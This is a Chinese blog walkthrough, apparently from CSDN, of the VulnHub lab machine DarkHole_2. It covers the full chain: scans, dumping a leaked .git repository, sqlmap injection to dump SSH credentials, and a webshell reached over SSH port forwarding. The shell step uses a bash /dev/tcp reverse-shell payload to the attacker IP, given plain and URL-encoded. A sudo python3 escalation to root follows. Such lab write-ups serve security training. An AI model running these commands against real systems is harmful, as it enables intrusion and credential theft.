靶机-DarkHole_2

最新推荐文章于 2024-07-02 18:10:23 发布
最新推荐文章于 2024-07-02 18:10:23 发布
阅读量168 收藏
点赞数
分类专栏: 靶机 文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58602402/article/details/131205960
版权

DarkHole_2

环境搭建

靶机下载地址
https://vulnhub.com/entry/darkhole-2,740/
kali攻击机ip:192.168.12.144
靶机ip:192.168.12.168

一、信息收集

1.主机发现,发现靶机ip:192.168.12.168

nmap -sn 192.168.12.1/24

在这里插入图片描述
2.对主机进行端口扫描,发现开放80和22端口

 nmap -sS -sV -O 192.168.12.168 -p-

在这里插入图片描述

二、漏洞挖掘

1.访问80端口,一个页面同时发现一个登录页面
在这里插入图片描述
在这里插入图片描述

2.对网站信息进行收集

whatweb http://192.168.12.168/

在这里插入图片描述
3.对网站进行目录扫描,发现很多git目录,说明存在git源码泄露

dirsearch -u "http://192.168.12.168/"

在这里插入图片描述
4.访问找到源码泄露的位置,并将文件进行下载

http://192.168.12.168/.git/

在这里插入图片描述

方法一:wget -r http://192.168.12.168/.git/
方法二:使用工具:githacker
下载地址:
https://gitcode.net/mirrors/WangYihang/GitHacker?utm_source=csdn_github_accelerator

下载:git clone https://gitcode.net/mirrors/WangYihang/GitHacker.git
安装工具:python3 -m pip install -i https://pypi.org/simple/ GitHacker
开始使用: githacker --url http://192.168.12.168/.git/ --output-folder dark

在这里插入图片描述
在这里插入图片描述
5.查看登录源码
在这里插入图片描述
查看git历史日志,发现第二处作者添加了默认凭据

git log

在这里插入图片描述
切换过去查看

git checkout a4d900a8d85e8938d3601f3cef113ee293028e10

在这里插入图片描述
再次查看login.php,获得默认用户和密码lush@admin.com/321
在这里插入图片描述

三、漏洞利用

1.用获得的用户和密码进行登录
在这里插入图片描述
2.url处可能存在sql注入

sqlmap -u http://192.168.12.168/dashboard.php?id=1  --cookie=PHPSESSID=ua4s5k56ne8n858b4phmb70jj0 --current-db --tamper=space2comment --level 4    //爆当前数据库,darkhole_2

在这里插入图片描述
爆表,ssh表和user表

sqlmap -u http://192.168.12.168/dashboard.php?id=1  --cookie=PHPSESSID=ua4s5k56ne8n858b4phmb70jj0 -D darkhole_2 --tables

在这里插入图片描述
爆内容,发现用户和密码:jehad/fool

sqlmap -u http://192.168.12.168/dashboard.php?id=1  --cookie=PHPSESSID=ua4s5k56ne8n858b4phmb70jj0 -D darkhole_2 -T ssh 
--dump

在这里插入图片描述

四、提权

1.用获得的用户和密码进行ssh登录
在这里插入图片描述
2.查看存在suid的文件

find / -user root -perm -4000 -print 2>/dev/null

在这里插入图片描述
3.查看定时任务

cat /etc/crontab

在这里插入图片描述
发现有一个用户losy开启了本地的9999端口,php -s是开启了一个网络服务器的意思。
4.到查找到的目录下查看,发现webshell文件

cd /opt/web
cat index.php

在这里插入图片描述
5.查看历史命令
在这里插入图片描述
6.尝试利用webshell—》反弹shell失败
在这里插入图片描述

7.webshell利用ssh正向代理

ssh -L 9999:127.0.0.1:9999 jehad@192.168.12.168

在这里插入图片描述
8.反弹shell

bash -c 'bash -i >& /dev/tcp/192.168.12.144/8989 0>&1'
url编码:%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%32%2e%31%34%34%2f%38%39%38%39%20%30%3e%26%31%27

kali开启监听8989端口
靶机执行

curl 'http://127.0.0.1:9999/?cmd=%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%32%2e%31%34%34%2f%38%39%38%39%20%30%3e%26%31%27'

成功反弹shell
在这里插入图片描述
9.查看历史命令。发现密码:gang
在这里插入图片描述
10.先ssh进行登录losy/gang,根据获取的命令利用python调sh
在这里插入图片描述

sudo /usr/bin/python3 -c 'import os; os.system("/bin/sh")'

在这里插入图片描述

二和不会
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CISP-PTE_windows操作系统安全V2.0.pptx
10-22
CISP-PTE_windows操作系统安全V2.0 Windows 操作系统安全是计算机安全的重要组成部分。... ... ...访问控制是 Windows 操作系统安全的重要组成部分。访问控制列表(Access Control List,ACL)是 NTFS 文件系统的重要组成...
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
Vulnhub靶机DARKHOLE_ 2
LainWith的博客
09-14 1297
系列DarkHole(此系列共2台)发布日期:2021年9月3日提示:不要浪费时间进行暴力破解;使用Vmware虚拟机难度:中目标:取得 root 权限 + 2 Flag主机发现端口扫描信息收集Git 库泄漏SQL注入本地端口转发本地信息收集密码爆破水平提权Root提权1、2。
[渗透测试学习靶机05] vulnhub靶场 DarkHole: 2
weixin_47112073的博客
10-19 1016
vulnhub靶场 DarkHole: 2,难度:困难级别
Dark_hole2靶机实战——详细版
最新发布
qq_74243714的博客
07-02 518
Sorry, user jehad may not run sudo on darkhole.(不可 sudo提权)--------------计划任务提权-------------sudo -l (发现不能够使用sudo,因为没有losy密码)发现修改历史中有账号和密码,以及dashboard.php页面。方法二:josy用户退回到根目录查看所有文件(包括隐藏文件)SSH登录losy用户(sudo提权)发现账号管理页面,可以修改账号信息。方法一:想到爆破密码(一般不建议)获取到SSH用户密码!
Neos的渗透测试靶机练习——DarkHole-2
qq_38678845的博客
01-22 1080
一次渗透测试靶机练习
VulnHub-DarkHole_ 2靶机详细渗透过程
MRS_jianai的博客
12-29 1098
VulnHub-DarkHole: 2靶机详细渗透过程
DarkHole_2靶机渗透攻略
weixin_47311099的博客
01-12 815
信息收集 主机发现 nmap -sC -sV 192.168.93.0/24 -p- 目标:192.168.93.134 开放22ssh,80http 网站信息收集 并未发现太多信息 但是根据nmap的扫描结果可知,目录192.168.93.134:80/.git/ 存在git泄露。 ​ git泄露漏洞利用 下载git源码 ​python2 GitHack.py http://192.168.93.134/.git ​ ​ 密码逻辑流程 在logon.php中可以发现用户、密码的处理逻辑 ​
CFS.zip_CFS-GA_cfs
09-21
2. **数据分块**:原始文件被分割成多个小的数据块,这些块是加密的基本单位。 3. **Chaffing**:在每个数据块之后添加一定数量的混淆块,混淆块由混沌序列生成。这些混淆块使得攻击者难以确定哪些是真正的数据块,...
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
网络攻防靶机-设计概要 V5.docx
09-06
网络攻防靶机-设计概要 V5.docx 网络攻防靶机是指一种可以模拟网络攻击和防御的系统,旨在提高网络安全防御能力。该系统的设计概要包括项目概况、术语与定义、项目来源与参考资料、引用标准和规范、系统总体框架、...
DarkHole_2
追求卓越,技术流~
01-14 1521
文章目录靶机环境一、信息收集二、 漏洞利用三、权力提升总结 靶机环境 攻击机:kali IP:192.168.247.129 靶机DarkHole_2 IP:192.168.247.131 一、信息收集 输入:nmap -A -T4 -sV -p- 192.168.247.131 Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-14 06:45 EST Nmap scan report for 192.168.247.131 Host is u
靶机darkhole_2
weixin_50339323的博客
09-09 1431
一、信息搜集 1. 获取IP nmap -sP 192.168.8.0/24 获取的IP:192.168.8.139 2. 扫描IP端口服务 nmap -sC -sV 192.168.8.139 3.目录探测: gobuster dir -q -u http://192.168.8.139 -w /usr/share/seclists/Discovery/Web-Content/common.txt 二、漏洞挖掘 1. 进入到网页 访问 192.168.8.139...
VulnHub——DarkHole_2
weixin_52512479的博客
08-03 180
IP:192.168.197.136,开启端口:22、80查看80端口存在登录界面,这里需要输入邮箱,密码。。。
DARKHOLE 2
Czheisenberg的博客
02-18 618
vulnhub靶场——DarkHole 2 WriteUp
靶机渗透练习45-DarkHole-2
hirak0的博客
04-19 2063
靶机描述 靶机地址:https://www.vulnhub.com/entry/darkhole-2,740/ Description Difficulty:Hard This works better with VMware rather than VirtualBox Hint: Don’t waste your time For Brute-Forc 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.143 注:靶机与K
VulnHub-DarkHole_2靶机实战(超详细保姆级教程),2024年最新重磅分享
2301_77116622的博客
04-14 838
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;
DARKHOLE: 2
weixin_45042115的博客
10-05 1887
信息收集 靶机下载地址为:vulnhub-DARKHOLE: 2 今日 的靶机漏洞练习 kali :100.100.100.131/24 靶机:100.100.100.132/24 依旧使用nmap神器对局域网主机开放服务端口进行扫描,瞅瞅有没有可以利用端口 nmap -v -T4 -sC -sV -p- 100.100.100.0/24 发现有100.100.100.132 主机有wbe页面 这个应该就此此次的目标了,对它单独的扫描一次,收集更多信息 发现开放22端口和80端口,即对应的远程连接
darkhole2
qq_62144749的博客
09-02 435
vulnhub darkhole2
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值